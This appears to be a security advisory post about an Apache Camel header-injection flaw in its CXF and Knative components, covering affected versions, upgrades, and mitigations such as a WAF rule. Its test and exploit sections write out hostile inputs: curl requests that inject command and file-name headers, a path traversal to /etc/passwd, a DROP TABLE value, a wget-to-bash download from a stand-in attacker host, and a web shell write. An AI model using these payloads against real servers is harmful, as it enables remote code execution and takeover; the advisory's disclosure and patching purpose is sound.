Listen to this Post
The vulnerability stems from incomplete header filtering in three Apache Camel components: `CxfRsHeaderFilterStrategy` (camel-cxf-rest), `CxfHeaderFilterStrategy` (camel-cxf-transport), and `KnativeHttpHeaderFilterStrategy` (camel-knative-http). While these strategies filter outbound Camel-internal headers using setOutFilterStartsWith, they fail to configure inbound filtering via setInFilterStartsWith. This allows an unauthenticated attacker to inject special headers (e.g., CamelExecCommandExecutable, CamelFileName) through HTTP requests to CXF-RS (REST) or CXF-SOAP endpoints. When a Camel route forwards such messages to header-driven components like `camel-exec` or camel-file, the injected headers override legitimate configuration values. For instance, an attacker can set `CamelExecCommandExecutable` to a malicious command, and if the route later invokes an exec component, that command executes on the server. Similarly, `CamelFileName` can point to an arbitrary path, leading to file write or overwrite. The pattern mirrors previous issues in camel-undertow (CVE-2025-30177), broader incoming-header filters (CVE-2025-27636, CVE-2025-29891), and non-HTTP strategies (CVE-2026-40453). Affected versions: Apache Camel from 3.18.0 to before 4.14.6, and from 4.15.0 to before 4.18.2. The fix introduces proper inbound filtering, blocking any `Camel` headers from untrusted HTTP inputs. Users on 4.18.x LTS must upgrade to 4.18.2; those on 4.14.x LTS to 4.14.6; all others should move to 4.19.0. Without mitigation, remote code execution or arbitrary file writes become trivial.
DailyCVE Form:
Platform: Apache Camel
Version: 3.18.0 to 4.18.2
Vulnerability: Message header injection
Severity: Critical
date: 2026-05-19
Prediction: Fixed in 4.19.0
What Undercode Say:
Check Camel version from Maven pom.xml or running instance grep -E 'camel-version|org.apache.camel' pom.xml Test header injection against a vulnerable CXF endpoint curl -H "CamelExecCommandExecutable: touch /tmp/pwned" \ -H "CamelFileName: ../../../etc/passwd" \ http://target:8080/cxf/orders Monitor Camel route logs for unexpected header propagation grep "Inbound header.Camel" /var/log/camel/application.log Enumerate all Camel-internal headers (non-exhaustive) curl -H "CamelFileName: test" -H "CamelExecCommandExecutable: id" \ -H "CamelHttpPath: /evil" -H "CamelSqlQuery: DROP TABLE" \ http://target:8080/cxf/test
Exploit:
- Identify a publicly exposed CXF-RS or CXF-SOAP endpoint.
- Craft an HTTP request adding one or more `Camel` headers (e.g.,
CamelExecCommandExecutable: /bin/sh -c "wget attacker/shell.sh | bash"). - If the route uses `camel-exec` or `camel-file` after the CXF consumer, the injected header triggers RCE or arbitrary file write.
- For file write, set `CamelFileName: ../../webapps/ROOT/shell.jsp` and send a body containing a web shell.
Protection:
- Upgrade to Camel 4.19.0, 4.18.2, or 4.14.6 immediately.
- If patching is impossible, manually override `inFilterStartsWith` in custom `HeaderFilterStrategy` to block any header starting with “Camel”.
- Deploy a WAF rule that rejects HTTP requests containing `Camel[A-Z]` in header names.
- Review all routes that forward CXF/Knative input to exec, file, sql, or script components.
Impact:
- Remote code execution: attacker can run arbitrary OS commands on the Camel server.
- Arbitrary file write: overwrite configuration, deploy backdoors, or poison data.
- Data exfiltration: combine with other headers (
CamelFileNamecould read sensitive files if a file consumer is triggered). - Lateral movement: compromised Camel instance often has access to internal networks and databases.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
